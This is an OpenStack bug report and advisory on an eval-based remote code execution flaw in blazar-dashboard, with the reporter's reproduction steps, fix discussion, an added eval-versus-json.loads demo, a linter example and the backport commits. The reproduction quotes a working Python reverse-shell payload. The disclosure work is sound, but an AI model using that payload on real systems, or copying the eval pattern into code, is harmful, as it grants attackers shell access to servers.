Authenticated RCE in blazar-dashboard via python expression in POST parameters

Bug #1895688 reported by Lukas on 2020-09-15
Affects: Blazar
Status: Fix Released
Importance: Critical
Assigned to: Pierre Riteau

Bug Description

#Description
Several endpoints in blazar-dashboard use the python `eval` function to parse raw user input which is expected to be in JSON format. This can be exploited by an authenticated user to gain arbitrary code execution on the Horizon host.

#Reproduction
- Log into Horizon (blazar_dashboard must be installed and enabled)
- Navigate to `Admin` -> `Reservation` -> `Hosts`
- Click `+ Create Hosts`
- Enter a python expression in the text area under `Extra Capabilities`
-- It is also possible to execute Python code containing multiple statements by wrapping it in an `exec('<python code>')` call
-- The attached video shows how a reverse shell can be achieved using this payload: `exec('import pty;import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")')`
- Click `Create Hosts`

#Suggested fix
1.) Use `json.loads` instead of `eval` to parse JSON data
Only the `extra_caps` parameter could be tested due to problems with the local testing setup. However, the attached patch replaces all 4 usages of `eval` within the blazar_dashboard project, as they seem likely to contain additional vulnerabilities.
Please note that this change will break some hopefully unused functionality, like:
- arithmetic expressions in property values
```
{
    "key": 1300 + 37
}
```
- pseudo JSON using single quotes instead of double quotes
```
{
    'key': 1337
}
```
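
The pattern the report describes, as an added example that is not part of the bug report or of blazar-dashboard: a form field parsed with `eval` beside the same field parsed with `json.loads`, run over constructed inputs modelled on the report's examples (valid JSON, the arithmetic and single-quote forms the suggested fix breaks, and a code payload). The stand-in payload only imports `os` and calls `getpid()` rather than spawning the report's reverse shell; it is enough to show that Python ran. Function names and inputs are assumptions made for illustration.

```python
import json

# Constructed sample inputs (not taken from the project); they mirror the
# shapes discussed in the bug report.
VALID_JSON = '{"key": 1337}'
NULL_JSON = '{"key": null}'                 # valid JSON, but not a Python literal
ARITHMETIC = '{"key": 1300 + 37}'           # Python expression, not JSON
SINGLE_QUOTES = "{'key': 1337}"             # Python dict literal, not JSON
# Harmless stand-in for the report's reverse-shell payload: under eval() this
# imports a module and calls a function, proving arbitrary code ran.
PAYLOAD = "__import__('os').getpid() > 0"


def parse_with_eval(raw):
    """Vulnerable pattern (pre-fix): the request field is executed as Python."""
    return eval(raw)  # deliberately insecure, kept for the comparison


def parse_with_json(raw):
    """Fixed pattern: json.loads() parses data only and never executes code."""
    try:
        value = json.loads(raw)
    except json.JSONDecodeError as exc:
        raise ValueError("field must be a JSON object: %s" % exc)
    # json.loads('1337') is valid JSON too; insist on an object so later
    # code can safely treat the result as a mapping.
    if not isinstance(value, dict):
        raise ValueError("field must be a JSON object, got %s"
                         % type(value).__name__)
    return value


def try_parse(parser, raw):
    """Run one parser on one input: ('ok', value) or ('rejected', reason)."""
    try:
        return ("ok", parser(raw))
    except Exception as exc:  # SyntaxError, NameError, ValueError, ...
        return ("rejected", "%s: %s" % (type(exc).__name__, exc))


def compare(raw):
    """Side-by-side outcome of both parsers on the same input."""
    return {"eval": try_parse(parse_with_eval, raw),
            "json": try_parse(parse_with_json, raw)}


if __name__ == "__main__":
    cases = [("valid JSON", VALID_JSON), ("JSON null", NULL_JSON),
             ("arithmetic", ARITHMETIC), ("single quotes", SINGLE_QUOTES),
             ("code payload", PAYLOAD)]
    for label, raw in cases:
        outcome = compare(raw)
        print("%-14s eval=%s  json=%s" % (label, outcome["eval"], outcome["json"]))
```

Besides refusing the payload, `json.loads` rejects the arithmetic and single-quoted forms the report lists, while `eval` in turn fails on ordinary JSON `null`, `true` and `false`, which Python does not know as names; the two were never interchangeable even for benign data. The same swap applies to the Nova-sourced and admin-only fields: data that merely looks like JSON should go through a parser that cannot execute it, regardless of who is trusted to supply it.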

Lukas (lukas-eu) wrote :

Replacing all instances of `eval` with json.parse

Lukas (lukas-eu) wrote :

Typo in previous comment: Patch replaces all instances of `eval` with `json.loads`

Jeremy Stanley (fungi) wrote :

I agree this sounds like a problem. I'm not especially familiar with use of Blazar, but it sounds like these JSON payloads are expected to come from sources other than the operator of the Horizon host, in which case this definitely represents at least privilege escalation.

Pierre: in your opinion would it be possible to include the included patch or something like it in a Victoria release candidate (as in by early next week)? If not, we're probably better off delaying any advisory until after release week and then backporting it in a stable point release just after.

Jeremy Stanley (fungi) wrote :

Also I do strongly recommend adding bandit to the linters for your projects, as it explicitly identifies use of eval/exec in your source code (among other common risks).
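
What such a linter looks for, as an added example that is neither bandit's own code nor the project's: a minimal `ast` walk that reports calls to the builtins `eval` and `exec`, the cases bandit reports as B307 and B102. The sample module is constructed for illustration and is not blazar-dashboard source.

```python
import ast

# Constructed sample module (not blazar-dashboard code) with the two calls a
# linter should flag and one safe json.loads() call it should ignore.
SAMPLE_SOURCE = '''
import json

def extra_caps(request):
    return eval(request.POST["extra_caps"])

def run(code):
    exec(code)

def safe(raw):
    return json.loads(raw)
'''

DANGEROUS_BUILTINS = {"eval", "exec"}


def _called_name(call):
    """Name of the callee if it is a bare builtin (eval) or builtins.eval."""
    func = call.func
    if isinstance(func, ast.Name):
        return func.id
    if (isinstance(func, ast.Attribute)
            and isinstance(func.value, ast.Name)
            and func.value.id == "builtins"):
        return func.attr
    return None


def find_dynamic_code(source, filename="<string>"):
    """Return sorted (lineno, name) pairs for eval()/exec() calls in source."""
    tree = ast.parse(source, filename)
    hits = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = _called_name(node)
            if name in DANGEROUS_BUILTINS:
                hits.append((node.lineno, name))
    return sorted(hits)


if __name__ == "__main__":
    for lineno, name in find_dynamic_code(SAMPLE_SOURCE, "sample.py"):
        print("sample.py:%d: call to %s() on untrusted data" % (lineno, name))
```

A real scan of the project would be `bandit -r blazar_dashboard` in a tox or pre-commit environment; the walk above only shows why the finding is mechanical and cheap to keep in CI.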

Pierre Riteau (priteau) wrote :

@Jeremy: Out of the four uses of eval, one is parsing data coming from Nova and two others are input from a Horizon admin. Unfortunately, the last one is parsing user input in the Update Lease form using the field titled "Reservation values to update".

Pierre Riteau (priteau) wrote :

We should be able to merge this for Victoria.

Pierre Riteau (priteau) on 2020-10-02
information type: Private Security → Public Security
Changed in blazar:
status: New → Confirmed
importance: Undecided → Critical
assignee: nobody → Pierre Riteau (priteau)

Fix proposed to branch: master
Review: https://review.opendev.org/755810

Changed in blazar:
status: Confirmed → In Progress

Reviewed: https://review.opendev.org/755810
Committed: https://git.openstack.org/cgit/openstack/blazar-dashboard/commit/?id=33c58438abf8221291d264db26a061279d4f22c7
Submitter: Zuul
Branch: master

commit 33c58438abf8221291d264db26a061279d4f22c7
Author: Lukas Euler <email address hidden>
Date: Tue Sep 15 15:25:40 2020 +0200

    Use json.loads instead of eval for JSON parsing

    Also fixed error messages.

    Change-Id: I998d6929ad05d9b5bc4e07f27f3f9cbf2dd64c68
    Closes-Bug: #1895688

Changed in blazar:
status: In Progress → Fix Released

Reviewed: https://review.opendev.org/755812
Committed: https://git.openstack.org/cgit/openstack/blazar-dashboard/commit/?id=168b4ae052480912fa6fdd2c77e16cd871528303
Submitter: Zuul
Branch: stable/ussuri

commit 168b4ae052480912fa6fdd2c77e16cd871528303
Author: Lukas Euler <email address hidden>
Date: Tue Sep 15 15:25:40 2020 +0200

    Use json.loads instead of eval for JSON parsing

    Also fixed error messages.

    Change-Id: I998d6929ad05d9b5bc4e07f27f3f9cbf2dd64c68
    Closes-Bug: #1895688
    (cherry picked from commit 33c58438abf8221291d264db26a061279d4f22c7)

tags: added: in-stable-ussuri

Reviewed: https://review.opendev.org/755813
Committed: https://git.openstack.org/cgit/openstack/blazar-dashboard/commit/?id=63e9c5d25617467016eea1dff0a34803c86b0953
Submitter: Zuul
Branch: stable/train

commit 63e9c5d25617467016eea1dff0a34803c86b0953
Author: Lukas Euler <email address hidden>
Date: Tue Sep 15 15:25:40 2020 +0200

    Use json.loads instead of eval for JSON parsing

    Also fixed error messages.

    Change-Id: I998d6929ad05d9b5bc4e07f27f3f9cbf2dd64c68
    Closes-Bug: #1895688
    (cherry picked from commit 33c58438abf8221291d264db26a061279d4f22c7)

tags: added: in-stable-train
tags: added: in-stable-stein

Reviewed: https://review.opendev.org/755814
Committed: https://git.openstack.org/cgit/openstack/blazar-dashboard/commit/?id=ee10b2c5c195088ec14725b790c17289ad20ed63
Submitter: Zuul
Branch: stable/stein

commit ee10b2c5c195088ec14725b790c17289ad20ed63
Author: Lukas Euler <email address hidden>
Date: Tue Sep 15 15:25:40 2020 +0200

    Use json.loads instead of eval for JSON parsing

    Also fixed error messages.

    Change-Id: I998d6929ad05d9b5bc4e07f27f3f9cbf2dd64c68
    Closes-Bug: #1895688
    (cherry picked from commit 33c58438abf8221291d264db26a061279d4f22c7)

Reviewed: https://review.opendev.org/756064
Committed: https://git.openstack.org/cgit/openstack/blazar-dashboard/commit/?id=5c7608dfa24dc5a5a3f18af09d35e8ea8760aee5
Submitter: Zuul
Branch: stable/victoria

commit 5c7608dfa24dc5a5a3f18af09d35e8ea8760aee5
Author: Lukas Euler <email address hidden>
Date: Tue Sep 15 15:25:40 2020 +0200

    Use json.loads instead of eval for JSON parsing

    Also fixed error messages.

    Change-Id: I998d6929ad05d9b5bc4e07f27f3f9cbf2dd64c68
    Closes-Bug: #1895688
    (cherry picked from commit 33c58438abf8221291d264db26a061279d4f22c7)

tags: added: in-stable-victoria